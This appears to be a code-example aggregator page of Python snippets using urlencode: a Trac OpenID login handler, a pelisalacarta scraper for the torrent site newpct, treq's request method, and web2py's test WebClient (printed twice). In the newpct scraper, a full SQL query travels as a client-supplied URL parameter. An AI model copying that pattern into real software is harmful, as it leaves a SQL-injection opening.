                req.outcookie['trac_auth'] = cookie
                req.outcookie['trac_auth']['path'] = req.href()
                if cookie_lifetime > 0:
                    req.outcookie['trac_auth']['expires'] = cookie_lifetime

                session_attr[self.openid_session_identity_url_key] = info.identity_url
                if email:
                    session_attr['email'] = email
                if fullname:
                    session_attr['name'] = fullname

                self._commit_oidsession(oidsession, req)

                # First look for an existing authenticated session with
                # matching identity_url.
                self.env.log.debug('Checking URL: %s' % info.identity_url)
                authname_for_identity_url = self.get_user(info.identity_url)
                if authname_for_identity_url:
                    authname = authname_for_identity_url
                    ds = DetachedSession(self.env, authname)
                    # The user already exists, update team membership
                    # XXX: Should also update name and/or email? (This would
                    # be an API change.)
                    for name in ['openid.teams']:
                        if name in session_attr:
                            ds[name] = session_attr[name]
                        elif name in ds:
                            del ds[name]
                    ds.save()
                else:
                    # New identity URL -> create new authname/user.
                    if self.check_list and self.check_list_username:
                        authname = cl_username
                    elif self.use_nickname_as_authname and nickname:
                        authname = nickname
                    elif session_attr.get('name'):
                        authname = session_attr['name']
                        if self.combined_username:
                            authname = '%s <%s>' % (authname, remote_user)
                    else:
                        authname = remote_user

                    # Possibly lower-case the authname.
                    if self.lowercase_authname:
                        authname = authname.lower()

                    if self.trust_authname:
                        ds = DetachedSession(self.env, authname)
                    else:
                        # Make authname unique in case of collisions
                        def authnames(base):
                            yield base
                            for attempt in itertools.count(2):
                                yield "%s (%d)" % (base, attempt)

                        users_and_groups_with_permissions = set(
                            user
                            for user, perm
                            in PermissionSystem(self.env).get_all_permissions())

                        for authname in authnames(authname):
                            ds = DetachedSession(self.env, authname)
                            # At least in 0.12.2, this means no session exists.
                            no_session_exists = ds.last_visit == 0 and len(ds) == 0
                            no_permissions_defined = authname not in users_and_groups_with_permissions
                            if (no_session_exists and no_permissions_defined):
                                # name is free :-)
                                break
                        # Set attributes for new user on the
                        # current anonymous session.  It will be promoted to
                        # the new authenticated session on the next request
                        # (by Session.__init__).
                        #
                        # NB: avoid dict.update here to ensure that
                        # DetachedSession.__getitem__ gets a chance to
                        # normalize values
                        for name, value in session_attr.items():
                            req.session[name] = value
                        self.env.log.info("Created new user '%s' for "
                            "OpenID identifier %s", authname, info.identity_url)

                req.authname = authname

                db = self.env.get_db_cnx()
                cursor = db.cursor()
                cursor.execute("INSERT INTO auth_cookie (cookie,name,ipnr,time) "
                               "VALUES (%s, %s, %s, %s)", (cookie, authname,
                               self._get_masked_address(req.remote_addr), int(time.time())))
                db.commit()

                req.redirect(req.session.get('oid.referer') or self.env.abs_href())
            else:
                message = 'You are not allowed here.'
        elif info.status == consumer.CANCEL:
            # cancelled
            message = 'Verification cancelled'
        elif info.status == consumer.SETUP_NEEDED:
            if info.setup_url:
                message = '<a href=%s>Setup needed</a>' % (
                    quoteattr(info.setup_url),)
            else:
                # This means auth didn't succeed, but you're welcome to try
                # non-immediate mode.
                message = 'Setup needed'
        else:
            # Either we don't understand the code or there is no
            # openid_url included with the error. Give a generic
            # failure message. The library should supply debug
            # information in a log.
            message = 'Verification failed.'

        self._commit_oidsession(oidsession, req)

        add_stylesheet(req, 'authopenid/css/openid.css')
        add_script(req, 'authopenid/js/openid-jquery.js')
        return 'openidlogin.html', {
            'images': req.href.chrome('authopenid/images') + '/',
            'action': req.href.openidverify(),
            'message': message,
            'signup': self.signup_link,
            'whatis': self.whatis_link,
            'css_class': css_class,
            'providers_regexp': self.providers_regexp,
            'custom_provider_name': self.custom_provider_name,
            'custom_provider_label': self.custom_provider_label,
            'custom_provider_url': self.custom_provider_url,
            'custom_provider_image': self.custom_provider_image,
            'custom_provider_size': self.custom_provider_size,
            }, None
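
One of the urlencode calls above builds the optional check_list URL and reads a JSON answer back from it. A standalone sketch of that round-trip; the endpoint URL, key names and identity below are illustrative and not the plugin's actual configuration:

import json
import urllib

check_list = 'http://auth.example.com/check_list'
params = {'check_list': 'https://openid.example.com/alice',
          'email': 'alice@example.com'}
url = check_list + '?' + urllib.urlencode(params)
result = json.load(urllib.urlopen(url))      # expects a JSON object keyed like the request
allowed = bool(result.get('check_list'))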

Example 47

Project: pelisalacarta
Source File: newpct.py
View license
def listado(item):
    logger.info("[newpct.py] listado")
    itemlist = []   
    data = scrapertools.cache_page(item.url)
    
    '''
    <li>
    <a href='http://www.newpct.com/descargar-pelicula/la-pequena-venecia/'>
    <div class='boxgrid captionb'>
    <img src='http://images.newpct.com/banco_de_imagenes/destacados/038707/la-pequeña-venecia--dvdrip--ac3-5-1-español-castellano--2012-.jpg'  alt='Descargar Peliculas Castellano &raquo; Películas RIP La Pequeña Venecia [DVDrip][AC3 5.1 Español Castellano][2012]' />
    <div class='cover boxcaption'>
    <h3>La Pequeña Venecia </h3>
    <p>Peliculas Castellano<br/>
    Calidad: DVDRIP AC3 5.1<br>
    Tama&ntilde;o: 1.1 GB<br>
    Idioma : Español Castellano
    </p>
    </div>
    </div>
    </a>
    <div id='bot-desc'>
    <div id='tinfo'>
    <a class='youtube' href='#' rel='gx9EKDC0UFQ' title='Ver Trailer' alt='Ver Trailer'>
    <img style='width:25px;' src='http://www.newpct.com/images.inc/images/playm2.gif'></a>
    </div>
    <div id='tdescargar' ><a class='atdescargar' href='http://www.newpct.com/descargar-pelicula/la-pequena-venecia/'>DESCARGAR</a></div>
    </div>
    </li>
    '''
    patron  = "<li[^<]+"
    patron += "<a href='([^']+)'[^<]+"
    patron += "<div class='boxgrid captionb'[^<]+"
    patron += "<img src='([^']+)'[^<]+"
    patron += "<div class='cover boxcaption'[^<]+"
    patron += '<h3>([^<]+)</h3>(.*?)</div>'
    
    matches = re.compile(patron,re.DOTALL).findall(data)    

    for scrapedurl,scrapedthumbnail,scrapedtitle,scrapedplot in matches:
        title = scrapedtitle.strip()
        title = unicode( title, "iso-8859-1" , errors="replace" ).encode("utf-8")

        url = urlparse.urljoin(item.url,scrapedurl)
        thumbnail = urlparse.urljoin(item.url,scrapedthumbnail)
        plot = scrapertools.htmlclean(scrapedplot).strip()
        plot = unicode( plot, "iso-8859-1" , errors="replace" ).encode("utf-8")

        if (DEBUG): logger.info("title=["+title+"], url=["+url+"], thumbnail=["+thumbnail+"]")
        if item.category == "serie":
            itemlist.append( Item(channel=item.channel, action="episodios" , title=title , url=url, thumbnail=thumbnail, plot=plot))
        else:
            itemlist.append( Item(channel=item.channel, action="findvideos" , title=title , url=url, thumbnail=thumbnail, plot=plot))

    # Next page
    '''
    GET /include.inc/ajax.php/orderCategory.php?type=todo&leter=&sql=SELECT+DISTINCT+++%09%09%09%09%09%09torrentID%2C+++%09%09%09%09%09%09torrentCategoryID%2C+++%09%09%09%09%09%09torrentCategoryIDR%2C+++%09%09%09%09%09%09torrentImageID%2C+++%09%09%09%09%09%09torrentName%2C+++%09%09%09%09%09%09guid%2C+++%09%09%09%09%09%09torrentShortName%2C++%09%09%09%09%09%09torrentLanguage%2C++%09%09%09%09%09%09torrentSize%2C++%09%09%09%09%09%09calidad+as+calidad_%2C++%09%09%09%09%09%09torrentDescription%2C++%09%09%09%09%09%09torrentViews%2C++%09%09%09%09%09%09rating%2C++%09%09%09%09%09%09n_votos%2C++%09%09%09%09%09%09vistas_hoy%2C++%09%09%09%09%09%09vistas_ayer%2C++%09%09%09%09%09%09vistas_semana%2C++%09%09%09%09%09%09vistas_mes++%09%09%09%09++FROM+torrentsFiles+as+t+WHERE++(torrentStatus+%3D+1+OR+torrentStatus+%3D+2)++AND+(torrentCategoryID+IN+(1537%2C+758%2C+1105%2C+760%2C+1225))++++ORDER+BY+torrentDateAdded++DESC++LIMIT+0%2C+50&pag=3&tot=&ban=3&cate=1225 HTTP/1.1
    Host: www.newpct.com
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:19.0) Gecko/20100101 Firefox/19.0
    Accept: */*
    Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Referer: http://www.newpct.com/peliculas-castellano/peliculas-rip/
    Cookie: adbooth_popunder=5%7CSat%2C%2009%20Mar%202013%2018%3A23%3A22%20GMT
    Connection: keep-alive
    '''
    
    '''
    function orderCategory(type,leter,pag,other)
    {
        
        
        if(leter=='buscar')
        {
            leter = document.getElementById('word').value;
        }
        if(type=='todo')
        {
            document.getElementById('todo').className = "active_todo";
        }	
        if(type=='letter')
        {
            switch(leter)
            {
                case '09':
                document.getElementById('09').className = "active_num";
                break;
                default:
                document.getElementById(leter).className = "active_a";
                break;
            }
        }
        
        var parametros = {
                    "type" : type,
                    "leter" : leter,
                    "sql" : "SELECT DISTINCT   						torrentID,   						torrentCategoryID,   						torrentCategoryIDR,   						torrentImageID,   						torrentName,   						guid,   						torrentShortName,  						torrentLanguage,  						torrentSize,  						calidad as calidad_,  						torrentDescription,  						torrentViews,  						rating,  						n_votos,  						vistas_hoy,  						vistas_ayer,  						vistas_semana,  						vistas_mes  				  FROM torrentsFiles as t WHERE  (torrentStatus = 1 OR torrentStatus = 2)  AND (torrentCategoryID IN (1537, 758, 1105, 760, 1225))    ORDER BY torrentDateAdded  DESC  LIMIT 0, 50",
                    "pag" : pag,   
                    "tot" : '',
                    "ban" : '3',
                    "other": other,
                    "cate" : '1225'
                    
            };
        //alert(type+leter);
        
        $('#content-category').html('<div style="margin:100px auto;width:100px;height:100px;"><img src="http://www.newpct.com/images.inc/images/ajax-loader.gif"/></div>');
            var page = $(this).attr('data');        
            var dataString = 'page='+page;
            
         $.ajax({
              type: "GET",
              url:   'http://www.newpct.com/include.inc/ajax.php/orderCategory.php',
              data:  parametros,
              success: function(data) {
             
                    //Cargamos finalmente el contenido deseado
                    $('#content-category').fadeIn(1000).html(data);
              }
         });
         
    }
    '''
    if item.extra!="":
        bloque=item.extra
    else:
        bloque = scrapertools.get_match(data,"function orderCategory(.*?)\}\)\;")
    logger.info("bloque="+bloque)
    param_type=scrapertools.get_match(data,"<a href='javascript:;' onclick=\"orderCategory\('([^']+)'[^>]+> >> </a>")
    logger.info("param_type="+param_type)
    param_leter=scrapertools.get_match(data,"<a href='javascript:;' onclick=\"orderCategory\('[^']+','([^']*)'[^>]+> >> </a>")
    logger.info("param_leter="+param_leter)
    param_pag=scrapertools.get_match(data,"<a href='javascript:;' onclick=\"orderCategory\('[^']+','[^']*','([^']+)'[^>]+> >> </a>")
    logger.info("param_pag="+param_pag)
    param_total=scrapertools.get_match(bloque,'"total"\s*\:\s*\'([^\']+)')
    logger.info("param_sql="+param_total)
    param_sql=scrapertools.get_match(bloque,'"sql"\s*\:\s*\'([^\']+)')
    logger.info("param_sql="+param_sql)
    param_tot=scrapertools.get_match(bloque,"\"tot\"\s*\:\s*'([^']*)'")
    logger.info("param_tot="+param_tot)
    param_ban=scrapertools.get_match(bloque,"\"ban\"\s*\:\s*'([^']+)'")
    logger.info("param_ban="+param_ban)
    param_cate=scrapertools.get_match(bloque,"\"cate\"\s*\:\s*'([^']+)'")
    logger.info("param_cate="+param_cate)
    base_url = scrapertools.get_match(bloque,"url\s*\:\s*'([^']+)'")
    base_url = re.sub("../..", "http://www.newpct.com", base_url, count=1)
    logger.info("base_url="+base_url)
    #http://www.newpct.com/include.inc/ajax.php/orderCategory.php?type=todo&leter=&sql=SELECT+DISTINCT+++%09%09%09%09%09%09torrentID%2C+++%09%09%09%09%09%09torrentCategoryID%2C+++%09%09%09%09%09%09torrentCategoryIDR%2C+++%09%09%09%09%09%09torrentImageID%2C+++%09%09%09%09%09%09torrentName%2C+++%09%09%09%09%09%09guid%2C+++%09%09%09%09%09%09torrentShortName%2C++%09%09%09%09%09%09torrentLanguage%2C++%09%09%09%09%09%09torrentSize%2C++%09%09%09%09%09%09calidad+as+calidad_%2C++%09%09%09%09%09%09torrentDescription%2C++%09%09%09%09%09%09torrentViews%2C++%09%09%09%09%09%09rating%2C++%09%09%09%09%09%09n_votos%2C++%09%09%09%09%09%09vistas_hoy%2C++%09%09%09%09%09%09vistas_ayer%2C++%09%09%09%09%09%09vistas_semana%2C++%09%09%09%09%09%09vistas_mes++%09%09%09%09++FROM+torrentsFiles+as+t+WHERE++(torrentStatus+%3D+1+OR+torrentStatus+%3D+2)++AND+(torrentCategoryID+IN+(1537%2C+758%2C+1105%2C+760%2C+1225))++++ORDER+BY+torrentDateAdded++DESC++LIMIT+0%2C+50&pag=3&tot=&ban=3&cate=1225
    url_next_page = base_url + "?" + urllib.urlencode( {"total": param_total, "type": param_type, "leter": param_leter, "sql": param_sql, "pag": param_pag, "tot": param_tot, "ban": param_ban, "cate": param_cate} )
    logger.info("url_next_page="+url_next_page)
    if item.category == "serie":
        itemlist.append( Item(channel=item.channel, action="listado" , title=">> Página siguiente" , url=url_next_page, extra=bloque, category="serie", viewmode="movie_with_plot"))
    else:
        itemlist.append( Item(channel=item.channel, action="listado" , title=">> Página siguiente" , url=url_next_page, extra=bloque, viewmode="movie_with_plot"))

    return itemlist
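
The pagination URL above passes a complete SQL statement as a single query parameter. A standalone sketch with a shortened, made-up sql value, showing how urlencode escapes the spaces and commas so the statement survives as one value:

import urllib

base_url = 'http://www.newpct.com/include.inc/ajax.php/orderCategory.php'
params = {'type': 'todo', 'leter': '', 'pag': '3', 'tot': '', 'ban': '3', 'cate': '1225',
          'sql': 'SELECT DISTINCT torrentID, torrentName FROM torrentsFiles LIMIT 0, 50'}
print base_url + '?' + urllib.urlencode(params)
# e.g. ...orderCategory.php?sql=SELECT+DISTINCT+torrentID%2C+torrentName+FROM+torrentsFiles+LIMIT+0%2C+50&type=todo&...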

Example 48

Project: treq
Source File: client.py
View license
    def request(self, method, url, **kwargs):
        method = method.encode('ascii').upper()

        # Join parameters provided in the URL
        # and the ones passed as argument.
        params = kwargs.get('params')
        if params:
            url = _combine_query_params(url, params)

        if isinstance(url, unicode):
            url = URL.fromText(url).asURI().asText().encode('ascii')

        # Convert headers dictionary to
        # twisted raw headers format.
        headers = kwargs.get('headers')
        if headers:
            if isinstance(headers, dict):
                h = Headers({})
                for k, v in headers.items():

                    if isinstance(k, unicode):
                        k = k.encode('ascii')

                    if isinstance(v, bytes):
                        h.addRawHeader(k, v)
                    elif isinstance(v, unicode):
                        h.addRawHeader(k, v.encode('ascii'))
                    elif isinstance(v, list):
                        cleanHeaders = []
                        for item in v:
                            if isinstance(item, unicode):
                                cleanHeaders.append(item.encode('ascii'))
                            else:
                                cleanHeaders.append(item)
                        h.setRawHeaders(k, cleanHeaders)
                    else:
                        h.setRawHeaders(k, v)

                headers = h
        else:
            headers = Headers({})

        # Here we choose a right producer
        # based on the parameters passed in.
        bodyProducer = None
        data = kwargs.get('data')
        files = kwargs.get('files')
        if files:
            # If the files keyword is present we will issue a
            # multipart/form-data request as it suits better for cases
            # with files and/or large objects.
            files = list(_convert_files(files))
            boundary = str(uuid.uuid4()).encode('ascii')
            headers.setRawHeaders(
                b'content-type', [
                    b'multipart/form-data; boundary=' + boundary])
            if data:
                data = _convert_params(data)
            else:
                data = []

            bodyProducer = multipart.MultiPartProducer(
                data + files, boundary=boundary)
        elif data:
            # Otherwise stick to x-www-form-urlencoded format
            # as it's generally faster for smaller requests.
            if isinstance(data, (dict, list, tuple)):
                headers.setRawHeaders(
                    b'content-type', [b'application/x-www-form-urlencoded'])
                data = urlencode(data, doseq=True)
            bodyProducer = self._data_to_body_producer(data)

        cookies = kwargs.get('cookies', {})

        if not isinstance(cookies, CookieJar):
            cookies = cookiejar_from_dict(cookies)

        cookies = merge_cookies(self._cookiejar, cookies)
        wrapped_agent = CookieAgent(self._agent, cookies)

        if kwargs.get('allow_redirects', True):
            if kwargs.get('browser_like_redirects', False):
                wrapped_agent = BrowserLikeRedirectAgent(wrapped_agent)
            else:
                wrapped_agent = RedirectAgent(wrapped_agent)

        wrapped_agent = ContentDecoderAgent(wrapped_agent,
                                            [(b'gzip', GzipDecoder)])

        auth = kwargs.get('auth')
        if auth:
            wrapped_agent = add_auth(wrapped_agent, auth)

        d = wrapped_agent.request(
            method, url, headers=headers,
            bodyProducer=bodyProducer)

        timeout = kwargs.get('timeout')
        if timeout:
            delayedCall = default_reactor(kwargs.get('reactor')).callLater(
                timeout, d.cancel)

            def gotResult(result):
                if delayedCall.active():
                    delayedCall.cancel()
                return result

            d.addBoth(gotResult)

        if not kwargs.get('unbuffered', False):
            d.addCallback(_BufferedResponse)

        return d.addCallback(_Response, cookies)

Example 49

Project: termite-data-server
Source File: webclient.py
View license
    def post(self, url, data=None, cookies=None,
             headers=None, auth=None, method='auto'):
        self.url = self.app + url

        # if this POST form requires a postback do it
        if data and '_formname' in data and self.postbacks and \
                self.history and self.history[-1][1] != self.url:
            # to bypass the web2py CSRF need to get formkey
            # before submitting the form
            self.get(url, cookies=cookies, headers=headers, auth=auth)

        # unless cookies are specified, recycle cookies
        if cookies is None:
            cookies = self.cookies
        cookies = cookies or {}
        headers = headers or {}

        cj = cookielib.CookieJar()
        args = [
            urllib2.HTTPCookieProcessor(cj),
            urllib2.HTTPHandler(debuglevel=0)
            ]
        # if required do basic auth
        if auth:
            auth_handler = urllib2.HTTPBasicAuthHandler()
            auth_handler.add_password(**auth)
            args.append(auth_handler)

        opener = urllib2.build_opener(*args)

        # copy headers from dict to list of key,value
        headers_list = []
        for key, value in self.default_headers.iteritems():
            if not key in headers:
                headers[key] = value
        for key, value in headers.iteritems():
            if isinstance(value, (list, tuple)):
                for v in value:
                    headers_list.append((key, v))
            else:
                headers_list.append((key, value))

        # move cookies to headers
        for key, value in cookies.iteritems():
            headers_list.append(('Cookie', '%s=%s' % (key, value)))

        # add headers to request
        for key, value in headers_list:
            opener.addheaders.append((key, str(value)))

        # assume everything is ok and make http request
        error = None
        try:
            if isinstance(data, str):
                self.method = 'POST' if method=='auto' else method
            elif isinstance(data, dict):
                self.method = 'POST' if method=='auto' else method
                # if there is only one form, set _formname automatically
                if not '_formname' in data and len(self.forms) == 1:
                    data['_formname'] = self.forms.keys()[0]

                # if there is no formkey but it is known, set it
                if '_formname' in data and not '_formkey' in data and \
                        data['_formname'] in self.forms:
                    data['_formkey'] = self.forms[data['_formname']]

                # time the POST request
                data = urllib.urlencode(data, doseq=True)
            else:
                self.method = 'GET' if method=='auto' else method
                data = None
            t0 = time.time()
            self.response = opener.open(self.url, data)
            self.time = time.time() - t0
        except urllib2.HTTPError, error:
            # catch HTTP errors
            self.time = time.time() - t0
            self.response = error

        if hasattr(self.response, 'getcode'):
            self.status = self.response.getcode()
        else:#python2.5
            self.status = None

        self.text = self.response.read()
        self.headers = dict(self.response.headers)

        # treat web2py tickets as special types of errors
        if error is not None:
            if 'web2py_error' in self.headers:
                raise RuntimeError(self.headers['web2py_error'])
            else:
                raise error

        # parse headers into cookies
        self.cookies = {}
        if 'set-cookie' in self.headers:
            for item in self.headers['set-cookie'].split(','):
                key, value = item[:item.find(';')].split('=')
                self.cookies[key.strip()] = value.strip()

        # check if a new session id has been issued, a symptom of a broken session
        if self.session_regex is not None:
            for cookie, value in self.cookies.iteritems():
                match = self.session_regex.match(cookie)
                if match:
                    name = match.group('name')
                    if name in self.sessions and self.sessions[name] != value:
                        print RuntimeError('Changed session ID %s' % name)
                    self.sessions[name] = value

        # find all forms and formkeys in page
        self.forms = {}
        for match in FORM_REGEX.finditer(self.text):
            self.forms[match.group('formname')] = match.group('formkey')

        # log this request
        self.history.append((self.method, self.url, self.status, self.time))
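
For context, a minimal usage sketch of this test client. It assumes the surrounding class is the WebClient from web2py's gluon/contrib/webclient.py, which this file appears to mirror; the application URL and form fields are placeholders:

from gluon.contrib.webclient import WebClient

client = WebClient('http://127.0.0.1:8000/welcome/default/')
client.get('index')
client.post('user/login',
            data={'email': 'admin@example.com',
                  'password': 'secret',
                  '_formname': 'login'})
# the dict is urlencoded with doseq=True and POSTed; _formkey is filled in
# automatically from the previously fetched form when it is known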

Example 50

Project: termite-visualizations
Source File: webclient.py
View license
    def post(self, url, data=None, cookies=None,
             headers=None, auth=None, method='auto'):
        self.url = self.app + url

        # if this POST form requires a postback do it
        if data and '_formname' in data and self.postbacks and \
                self.history and self.history[-1][1] != self.url:
            # to bypass the web2py CSRF need to get formkey
            # before submitting the form
            self.get(url, cookies=cookies, headers=headers, auth=auth)

        # unless cookies are specified, recycle cookies
        if cookies is None:
            cookies = self.cookies
        cookies = cookies or {}
        headers = headers or {}

        cj = cookielib.CookieJar()
        args = [
            urllib2.HTTPCookieProcessor(cj),
            urllib2.HTTPHandler(debuglevel=0)
            ]
        # if required do basic auth
        if auth:
            auth_handler = urllib2.HTTPBasicAuthHandler()
            auth_handler.add_password(**auth)
            args.append(auth_handler)

        opener = urllib2.build_opener(*args)

        # copy headers from dict to list of key,value
        headers_list = []
        for key, value in self.default_headers.iteritems():
            if not key in headers:
                headers[key] = value
        for key, value in headers.iteritems():
            if isinstance(value, (list, tuple)):
                for v in value:
                    headers_list.append((key, v))
            else:
                headers_list.append((key, value))

        # move cookies to headers
        for key, value in cookies.iteritems():
            headers_list.append(('Cookie', '%s=%s' % (key, value)))

        # add headers to request
        for key, value in headers_list:
            opener.addheaders.append((key, str(value)))

        # assume everything is ok and make http request
        error = None
        try:
            if isinstance(data, str):
                self.method = 'POST' if method=='auto' else method
            elif isinstance(data, dict):
                self.method = 'POST' if method=='auto' else method
                # if there is only one form, set _formname automatically
                if not '_formname' in data and len(self.forms) == 1:
                    data['_formname'] = self.forms.keys()[0]

                # if there is no formkey but it is known, set it
                if '_formname' in data and not '_formkey' in data and \
                        data['_formname'] in self.forms:
                    data['_formkey'] = self.forms[data['_formname']]

                # time the POST request
                data = urllib.urlencode(data, doseq=True)
            else:
                self.method = 'GET' if method=='auto' else method
                data = None
            t0 = time.time()
            self.response = opener.open(self.url, data)
            self.time = time.time() - t0
        except urllib2.HTTPError, error:
            # catch HTTP errors
            self.time = time.time() - t0
            self.response = error

        if hasattr(self.response, 'getcode'):
            self.status = self.response.getcode()
        else:#python2.5
            self.status = None

        self.text = self.response.read()
        self.headers = dict(self.response.headers)

        # treat web2py tickets as special types of errors
        if error is not None:
            if 'web2py_error' in self.headers:
                raise RuntimeError(self.headers['web2py_error'])
            else:
                raise error

        # parse headers into cookies
        self.cookies = {}
        if 'set-cookie' in self.headers:
            for item in self.headers['set-cookie'].split(','):
                key, value = item[:item.find(';')].split('=')
                self.cookies[key.strip()] = value.strip()

        # check if a new session id has been issued, a symptom of a broken session
        if self.session_regex is not None:
            for cookie, value in self.cookies.iteritems():
                match = self.session_regex.match(cookie)
                if match:
                    name = match.group('name')
                    if name in self.sessions and self.sessions[name] != value:
                        print RuntimeError('Changed session ID %s' % name)
                    self.sessions[name] = value

        # find all forms and formkeys in page
        self.forms = {}
        for match in FORM_REGEX.finditer(self.text):
            self.forms[match.group('formname')] = match.group('formkey')

        # log this request
        self.history.append((self.method, self.url, self.status, self.time))